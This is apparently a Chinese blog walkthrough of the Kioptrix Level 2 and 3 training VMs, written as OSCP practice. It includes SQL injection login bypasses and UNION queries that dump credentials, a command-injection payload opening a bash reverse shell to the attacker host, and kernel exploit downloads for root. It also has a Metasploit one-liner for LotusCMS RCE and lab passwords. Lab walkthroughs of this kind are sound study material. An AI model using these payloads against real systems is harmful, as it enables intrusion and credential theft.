Day4 Kioptrix 系列靶机2-3

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。关注公众号泷羽Sec-静安，后台回复找工具+Day4获取BurpSuit 和Yakit安装包。

2025年2月7日 22点36分

为了提高学习效率，我会在文章开头写日期和时间，末尾写结束时候的时间，看多久学的玩。有时候我也不是一口气学完，而是学一般要么有主业的工作打断，要么该睡觉了。

Kioptrix: Level 1.1 (#2)

2025年2月8日 14点15分

在攻击机上输入ifconfig查看本机网段。

nmap -sP 192.168.139.0/24 -T5

扫描网段，发现130网段，是靶机，本机是128，254是网关，1，2都是网关。打开网页看一下，推测是sql注入。

nmap -sS -T5 192.168.139.130 -A
nmap -sS -T5 192.168.139.130 -p-

扫描靶机的端口。

sql万能密码都试一遍。以下两个都可以

admin' and 1=1 -- +
admin' -- +

网页提示让我们ping机器，但是没有ping的地方。dirb http://192.168.139.130/ 扫描目录发现一个没啥用的manual页面，先放着

查看网页源码发现有括号没有闭合。

复制后粘贴修改源码，把括号闭合。

出现ping框。

输入执行whoami的测试语句，能看到执行了whoami的语句。

然后构造一个反弹shell的语句用来链接shell。到网站 https://www.ddosi.org/shell/ 可以快速构造反弹语句。

nc -lvnp 9001

在攻击机输入监听命令启动监听。

在浏览器submit处的127.0.0.1 && 后面拼接反弹命令得到

127.0.0.1 && /bin/bash -i >& /dev/tcp/192.168.139.128/9001 0>&1

成功回弹获得bash权限，接下来是提权为root账户。执行uname 和lsb_release -a发现版本号，搜索相关poc。

从核心版本号2.6.9选择9542.c这个poc。

searchsploit -m 9542.c

攻击机开启http服务，上传poc到靶机。

python -m http.server

cd /tmp
wget http://192.168.139.128:8000/9542.c

编译执行，提权成功。

gcc -o exp 9542.c
./exp
whoami

2025年2月8日 14点55分

Kioptrix: Level 1.2 (#3)

开启靶机后，在攻击机扫描网段。以下命令多开终端同步扫。

nmap -sP 192.168.139.0/24 -T5
nmap -sS -T5 192.168.139.131 -p-
nmap -sS 192.168.139.131 -p- --min-rate 1000 -A
dirb http://192.168.139.131/

访问80端口看到网页，点了一圈没有发现。

目录扫描发现php管理员登录入口。

发现登录界面，用万能密码，只填用户名，密码部分留空。

root" and 1=1 -- +

点击表，点击搜索，发现安全设置有问题，可以写文件。

show global variables like "secure%";

暂时没有想法，先从其他地方继续收集信息。从80网页点进去发现一个登录窗口。

主页点gallery会跳转到新的地址，但是图片之类的都显示不出来。

2025年2月8日 15点45分

中间去工作了，然后发现自己没有安装BurpSuit，原本装的Pro版，后来刷机刷没了，Yakit的劫持也忘了配置，浏览器插件没有装，去安装了一下。安装步骤可以看最后面。

2025年2月8日 18点49分

Lotus CMS 漏洞&passwd漏洞

先找找Lotus CMS有没有什么漏洞，这个是登录网页的框架。搜索发现如下工具。

https://github.com/Hood3dRob1n/LotusCMS-Exploit

选择1，反弹成功。

接下来需要提权成root。

目前这个中腹案不太好看，发现有python，给他弄成交互式终端。

python -c 'import pty; pty.spawn("/bin/bash")'

查询终端信息。

试了一些常规的提权方法不行，翻翻看文件夹，发现home文件夹下有个READEME文件。


Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
---
你好，新员工，使用我们新安装的软件来编辑、创建和查看文件是公司的规定。请使用命令“sudo ht”。如果不这样做，你将被立即解雇。DG首席执行官

sudo了一下也不行。另一个文件好像也不是有用的。

回到READEME的提示，会发现要执行的时候没有paswwd，所以想从etc/passwd方向入手。看到有两个poc：40847.cpp和40839.c

编译第一个

g++ -o 40847 40847.cpp
./40847 -h
---
./40847 [-s] [-n] | [-h]

 -s  open directly a shell, if the exploit is successful;
 -n  combined with -s, doesn't restore the passwd file.
 -h  print this synopsis;

 If no param is specified, the program modifies the passwd file and exits.
 A copy of the passwd file will be create in the current directory as .ssh_bak
 (unprivileged user), if no parameter or -n is specified.

---
-s如果攻击成功，直接打开shell；
-n和-s组合，不恢复passwd文件。-h打印概要；
如果没有指定参数，程序将修改passwd文件并退出。
在当前目录中将以.ssh的形式创建passwd文件的副本_如果不指定参数或-n，则为Bak（非特权用户）。

失败，换40839，编译报错，提示缺少库文件。

文件中给出了编译命令。

gcc -pthread 40839.c -o 40839 -lcrypt

下载到靶机上编译执行。

这里我没注意看，它提示重置密码，我直接输入成了ls，等待他执行改密操作。

他现在提示我现在可以用ls做密码登录账户firefart，注意添加 -o 参数，不然版本太低登不进去。登不进去就直接su firefart

ssh -o HostKeyAlgorithms=+ssh-rsa firefart@192.168.139.131

虽然名字不是root，但是权限是root。

页面sql注入漏洞

因为之前找到phpadmin登陆界面，应该是有sql漏洞的。

主页点击浏览，发现有很多图片显示不出来，点击任意一个链接发现跳转新的域名，这个域名不是已经注册的，可能是跳转自己，但是DNS没有解析。

修改本机Host文件，让这个域名解析到指定ip，就是靶机的ip。

保存host文件，刷新一下浏览器就有了。

发现疑似注入的入口。

存在，可用，接下来就是调参了。

sqlmap 自动注入

懒人用sqlmap走一下捷径，实际考试sqlmap有限制次数，所以小的能手注的还是练习一下。

sqlmap -u http://192.168.139.131/gallery/gallery.php?id=1* --dbs --batch
sqlmap -u http://192.168.139.131/gallery/gallery.php?id=1* -D gallery --tables --batch
sqlmap -u http://192.168.139.131/gallery/gallery.php?id=1* -D gallery -T gallarific_users --dump-all

最后一步爆库很慢

手动注入

http://kioptrix3.com/gallery/gallery.php?id=1'  # 报错
http://kioptrix3.com/gallery/gallery.php?id=1   # 不报错，是整数型注入
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,33,44,55,66
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,database(),user(),44,55,66  
# 回显 database()为gallery，user()为root@localhost
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(schema_name),44,55,66 from information_schema.schemata
# 回显 information_schema,gallery,mysql
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(TABLE_NAME),44,55,66  from information_schema.TABLES where TABLE_SCHEMA=database()
# 回显 dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users
# gallarific_users 里可能会有用户名和密码 查表
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(column_name),44,55,66 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='gallarific_users' 
# 回显 userid,username,password,usertype,firstname,lastname,email,datejoined,website,issuperuser,photo,joincode
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,username,password,44,55,66 from  gallery.gallarific_users
# 回显 admin n0t7t1k4
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(concat_ws(':',username,password)) ,44,55,66 from  gallery.gallarific_users
# 回显 admin:n0t7t1k4
http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(concat_ws(':',username,password)) ,44,55,66 from  gallery.dev_accounts
# 回显 dreg:0d3eccfb887aabd50f243b3f155c0f85,loneferret:5badcaf789d3d1d09794d8f021f40f0e

# 回显 admin:n0t7t1k4
# 回显 dreg:0d3eccfb887aabd50f243b3f155c0f85,loneferret:5badcaf789d3d1d09794d8f021f40f0e
---
# 解密后为 https://www.cmd5.com/default.aspx
admin:n0t7t1k4
dreg:Mast3r
loneferret:starwars

ssh登录

ssh -oHostKeyAlgorithms=+ssh-rsa admin@192.168.139.131
ssh -oHostKeyAlgorithms=+ssh-rsa dreg@192.168.139.131
ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@192.168.139.131

除了admin的账户登不上，其他的都可以登录，这里可以又回到之前的用passwd漏洞切换账户。

suid 提权

也可以用suid方法提权。

find / -perm -u=s -type f 2>/dev/null # 发现有sudo 命令

2025年2月8日 22点27分

做到这里一开始怀疑是40839的问题，后来解压了新靶机也不行，推测是靶机文件问题，从官方渠道下载新的。 https://download.vulnhub.com/kioptrix/KVM3.rar 等着下载，然后正好也歇一会

2025年2月8日 22点39分

按键盘alt+w唤出选择界面，选择打开/etc/sudoers。

修改添加/bin/sh使root权限可以再bash中使用。保存退出。

MSF 工具箱 LotusCMS RCE

searchsploit lotuscms

注意OSCP考试只能使用一次MSF工具箱，所以应该掌握多种攻击方法。

先在2另一个终端开启监听。

set rhosts 192.168.139.132
set uri /index.php?system=Admin
set lhost 192.168.139.128
set lport 9001
set payload generic/shell_reverse_tcp

然后再已经开启的9001端口就可以看得到回弹了。也可以把上述msf命令写成一行。

msfconsole -q -x 'use exploit/multi/http/lcms_php_exec;set uri /index.php?system=Admin;set rhosts 192.168.139.132;set lhost 192.168.139.128;set lport 9001;set payload generic/shell_reverse_tcp;run'

phpadmin 漏洞

使用LotusCMS漏洞进去后还有个地方进去。在配置文件下有数据库的账号密码。

cd gallery
cat gconfig.php
---
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

2025年2月9日 00点01分

到此刷完K3靶机，本来2到5是Day4一天的内容，但是我刷不完，就分两次做了。

参考

https://www.cnblogs.com/wsec/p/vulhub0x03.html#1-sqli%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5 https://blog.csdn.net/shulao2010/article/details/130818800

静静